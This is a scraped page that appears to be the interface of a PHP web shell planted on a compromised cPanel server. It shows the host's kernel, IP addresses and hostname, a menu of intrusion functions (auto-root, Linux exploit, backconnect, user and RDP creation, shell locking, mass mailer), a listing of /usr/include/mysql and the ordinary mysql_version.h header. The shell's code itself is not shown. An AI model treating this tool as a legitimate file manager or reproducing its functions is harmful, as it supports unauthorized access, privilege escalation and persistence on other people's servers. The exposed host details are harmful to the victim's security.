Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.69.130.94
138 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
include /
mysql /
[ HOME SHELL ]
Name
Size
Permission
Action
mysql
[ DIR ]
drwxr-xr-x
errmsg.h
5.65
KB
-rw-r--r--
field_types.h
3.01
KB
-rw-r--r--
my_command.h
4.36
KB
-rw-r--r--
my_compress.h
3.61
KB
-rw-r--r--
my_list.h
2.07
KB
-rw-r--r--
mysql.h
32.81
KB
-rw-r--r--
mysql_com.h
36.51
KB
-rw-r--r--
mysql_time.h
3.52
KB
-rw-r--r--
mysql_version.h
1.12
KB
-rw-r--r--
mysqld_error.h
256.51
KB
-rw-r--r--
mysqlx_ername.h
7.08
KB
-rw-r--r--
mysqlx_error.h
4.06
KB
-rw-r--r--
mysqlx_version.h
1.81
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mysql_version.h
/* Copyright Abandoned 1996,1999 TCX DataKonsult AB & Monty Program KB & Detron HB, 1996, 1999-2004, 2007 MySQL AB. This file is public domain and comes with NO WARRANTY of any kind */ /* Version numbers for protocol & mysqld */ #ifndef _mysql_version_h #define _mysql_version_h #define PROTOCOL_VERSION 10 #define MYSQL_SERVER_VERSION "8.0.42" #define MYSQL_BASE_VERSION "mysqld-8.0" #define MYSQL_SERVER_SUFFIX_DEF "" #define MYSQL_VERSION_ID 80042 #define MYSQL_VERSION_STABILITY "LTS" #define MYSQL_PORT 3306 #define MYSQL_ADMIN_PORT 33062 #define MYSQL_PORT_DEFAULT 0 #define MYSQL_UNIX_ADDR "/var/run/mysqld/mysqld.sock" #define MYSQL_CONFIG_NAME "my" #define MYSQL_PERSIST_CONFIG_NAME "mysqld-auto" #define MYSQL_COMPILATION_COMMENT "MySQL Community - GPL" #define MYSQL_COMPILATION_COMMENT_SERVER "MySQL Community Server - GPL" #define LIBMYSQL_VERSION "8.0.42" #define LIBMYSQL_VERSION_ID 80042 #ifndef LICENSE #define LICENSE GPL #endif /* LICENSE */ #endif /* _mysql_version_h */
Close